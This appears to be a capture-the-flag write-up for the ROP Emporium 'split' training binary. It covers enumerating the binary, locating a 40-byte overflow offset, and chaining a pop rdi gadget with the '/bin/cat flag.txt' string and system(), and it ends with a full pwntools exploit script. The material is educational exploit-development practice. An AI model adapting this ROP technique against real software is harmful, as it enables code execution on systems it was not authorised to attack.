Skip to content

split

The elements that allowed you to complete ret2win are still present, they've just been split apart. Find them and recombine them using a short ROP chain.

Enumeration

Checksec:

1
2
3
4
5
6
7
8
pwndbg> checksec
File:     /home/admin/sboxshare/ropemporium/split/split
Arch:     amd64
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
Stripped:   No
When run, the program simply asks for input and quits: 
1
2
3
4
5
6
7
8
9
$ ./split
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> AAAAAA
Thank you!

Exiting

Attack

Similar to ret2win, the program has a 32 byte buffer, but attempts to read up to 96 bytes of input:

1
2
3
4
5
6
7
8
9
004006e8    int64_t pwnme()
004006e8    {
004006e8        void buf;
00400701        memset(&buf, 0, 0x20);
0040070b        puts("Contriving a reason to ask user …");
0040071a        printf("> ");
00400730        read(0, &buf, 0x60);
00400741        return puts("Thank you!");
004006e8    }

The padding length is calculated like so:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
pwndbg> search ABA
Searching for byte: b'ABA'
[stack]         0x7ffec0f085b0 0xa414241 /* 'ABA\n' */
pwndbg> info frame
Stack level 0, frame at 0x7ffec0f085e0:
 rip = 0x400735 in pwnme; saved rip = 0x4006d7
 called by frame at 0x7ffec0f085f0
 Arglist at 0x7ffec0f085d0, args:
 Locals at 0x7ffec0f085d0, Previous frame's sp is 0x7ffec0f085e0
 Saved registers:
  rbp at 0x7ffec0f085d0, rip at 0x7ffec0f085d8
pwndbg> distance 0x7ffec0f085b0 0x7ffec0f085d0
0x7ffec0f085b0->0x7ffec0f085d0 is 0x20 bytes (0x4 words)

From the above, 40 bytes (32 for the buffer and 8 to overwrite RBP) are needed to reach the return address.

Unlike ret2win, this binary doesn't have a built-in win function. Instead, there is a system() function that accepts a single argument and calls system() on it:

1
2
3
4
5
00400560    int32_t system(char const* line)
00400560    {
00400560        /* tailcall */
00400560        return system(line);
00400560    }

As the binary has NX enabled, the only way of supplying an argument to system() is by providing the address of an already existing string from somewhere in memory:

1
2
3
$ strings -tx split |grep cat
   1060 /bin/cat flag.txt
   1948 _dl_relocate_static_pie

The string address can be retrieved dynamically with pwntools using p64(next(elf.search(b'/bin/cat'))).

The next step is to place the address on the stack so that it executes when the buffer overflow is triggered. The program will interpret it as the argument to system() and read the flag.

In order to place the address in RDI (as per the x86_64 calling convention), a gadget for popping to RDI and returning is needed. Since the call will pop the top of the stack (and place it into RDI), the call to pop rdi needs come before the argument. This way, when the program executes pop rdi, it will treat the top of the stack (the address) as the item to place in RDI.

Putting it all together gives the following payload:

1
2
3
4
5
poprdi = p64(0x4007c3)
ret = p64(0x40053e)
system = p64(elf.symbols['system'])
catflag = p64(next(elf.search(b'/bin/cat')))
p.sendlineafter(b'> ', b'A'*40 + poprdi + catflag + ret + system)

Attack Script

solve.py 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
exe = "./split"
elf = context.binary = ELF(exe)
rop = ROP(elf)
gdbscript = '''
b *pwnme+77
c
'''

if args.LOCAL:
    p = process(elf.path)
    if args.GDB:
        gdb.attach(p, gdbscript=gdbscript)

poprdi = p64(0x4007c3)
ret = p64(0x40053e)
system = p64(elf.symbols['system'])
catflag = p64(next(elf.search(b'/bin/cat')))
p.sendlineafter(b'> ', b'A'*40 + poprdi + catflag + ret +  system)
p.recv()
print(p.recvline().decode())